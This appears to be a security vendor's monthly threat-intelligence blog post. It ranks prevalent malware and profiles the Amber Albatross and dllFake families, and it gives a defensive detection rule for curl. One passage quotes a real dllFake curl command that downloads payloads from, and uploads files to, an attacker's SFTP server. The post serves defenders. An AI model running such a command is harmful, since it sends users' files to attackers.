Skip Navigation
Get a Demo
 
 
 
 
 
 
 
 
 
Resources Blog Threat intelligence

Intelligence Insights: July 2024

Amber Albatross arrives and dllFake debuts in this month’s edition of Intelligence Insights

The Red Canary Team
Originally published . Last modified .

Highlights from June

ChromeLoader hit the top spot on our top 10 most prevalent threat list this month, in part due to changes in the way Red Canary detects this threat. ChromeLoader last appeared in the top 10 in October 2023 and was our 6th most prevalent threat for all of 2023

.

 

Several threats dropped out of the rankings altogether, including Gootloader and PlugX, after many consecutive months in the top 10.

We have two newcomers to our top 10 list this month. Amber Albatross, coming in 4th place, may be new to the rankings but we began tracking it in January 2024. The activity starts with a potentially unwanted program (PUP) and ultimately leads to a pyInstaller executable with stealer capabilities. Read more about Amber Albatross below.

The other newcomer, making its debut on our list as one of our ties for the 6th spot, is dllFake. dllFake is a malware family—first publicly reported and named by Rapid7 in June 2024—that primarily targets browsers and crypto wallets. You can read more about it below.

This month’s Top 10 threats

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.

Here’s how the numbers shook out for June 2024:

Month's rankThreat nameThreat description
Month's rank:

1

Threat name:Threat description :

Malware that modifies victims’ browser settings and redirects user traffic to advertisement websites

Month's rank:

2

Threat name:Threat description :

Collection of Python classes to construct/manipulate network protocols

Month's rank:

3

Threat name:Threat description :

Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drive

Month's rank:

4

Threat name:

Amber Albatross

Threat description :

Red Canary-named cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities

Month's rank:

5

Threat name:Threat description :

Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access

Month's rank:

6*

Threat name:

Adload

Threat description :

macOS malware that attempts to hijack and redirect user web browsing traffic

Month's rank:

6*

Threat name:

Atomic Stealer

Threat description :

Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets

Month's rank:

6*

Threat name:Threat description :

Penetration testing tool that integrates functionality from multiple offensive security projects and has the ability to extend its functionality with a native scripting language

Month's rank:

6*

Threat name:

dllFake

Threat description :

Malware family that can collect keystrokes and steal information from browsers, crypto wallets, and the user's clipboard

Month's rank:

6*

Threat name:

LummaC2

Threat description :

Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads

Month's rank:

6*

Threat name:Threat description :

Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems

Month's rank:

6*

Threat name:Threat description :

Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code

= trending up from previous month
= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

 

Amber Albatross unleashed by PUPs

Amber Albatross is a Red Canary-named activity cluster that begins with a PUP-bundled installation and leads to a pyInstaller executable with stealer-like capabilities. We started observing and tracking Amber Albatross in January 2024.

Amber Albatross is delivered via a setup file downloaded and executed by certain PUPs. We have observed Amber Albatross bundled in downloads from PcAppStore, Bit Guardian’s Bit Driver Updater, and Malware Crusher. The installed PUP executes an installer—sometimes InnoSetup installer—that drops and executes a binary like this one. That binary in turn makes network connections to external sites, for example creaper[.]world or servers-servers-servers[.]com, and downloads additional binaries, ultimately unpacking a pyarmor-obfuscated pyInstaller executable.

This final executable launches via CMD and PowerShell, typically running as a process named with numbers and no extension. We’ve seen it run checks to see if it’s running in a virtual environment, to determine if AV is installed, as well as querying browser and system information. While we cannot at this time discern how Amber Albatross uses this information, we find it suspicious enough to warrant continued tracking and monitoring.

The DL on dllFake

Our second newcomer to the top 10 list this month is dllFake, which we first observed in June 2024. dllFake is a malware family that primarily targets browsers and crypto wallets. It is reportedly distributed by compromised Notezilla, RecentX, and Copywhiz software.

It uses files, including EXE and BAT files with names similar to dllBus.bat and dllCrt32.exe, for initial execution. It creates a scheduled task (one observed taskname was Check dllHourly32) to achieve persistence. dllFake uses curl to reach out to SFTP to download additional payloads and upload collected information, using commands like:

curl.exe -s -k --connect-timeout 30 sftp://104.206.2[.]18:2265/PHN/dll_valid.php?a=26735 --user username:password

It looks for TXT, DOC, PNG and JPG files and uploads them back to the SFTP server via curl. The second stage—also downloaded via curl—can copy clipboard data and keystrokes.

The use of curl to download tools and upload data gives us a detection opportunity.

 


Detection opportunity: curl initiating an external network connection to an IP address

This pseudo detection analytic identifies curl initiating an external network connection to an IP address. Adversaries and malware like dllFake will leverage curl to initiate a network connection to a remote IP address for purposes of writing an additional payload to disk or creating a reverse shell. Administrators may download remote files using similar commands, making it important to validate the IP address and any files written to disk.

process == (curl)

&&

command_line_includes == (<IP address:port>)

&&

command_line_may_include == ( -o )

&&

command_line_does_not_include == (*)

Note: * is a placeholder for strings associated with legitimate use of curl in your environment

In case you missed it: Scarlet Goldfinch leverages NetSupport Manager

Scarlet Goldfinch is a cluster of activity that Red Canary named and first observed in June 2023. This threat deceives users into downloading a file masquerading as a browser update, which starts a chain of activity eventually leading to the installation of NetSupport Manager. NetSupport Manager is a remote monitoring and management (RMM) tool that provides the adversary remote control over a system.

On June 26, Alex Berninger and Red Canary published a blog and video discussing Scarlet Goldfinch, its use of RMM tools, and offering insights into how defenders can protect their organizations from this threat.

 

Intelligence Insights: December 2024

 

Storm-1811 exploits RMM tools to drop Black Basta ransomware

 

Intelligence Insights: November 2024

 

Stealers evolve to bypass Google Chrome’s new app-bound encryption

Subscribe to our blog

 
 
Back to Top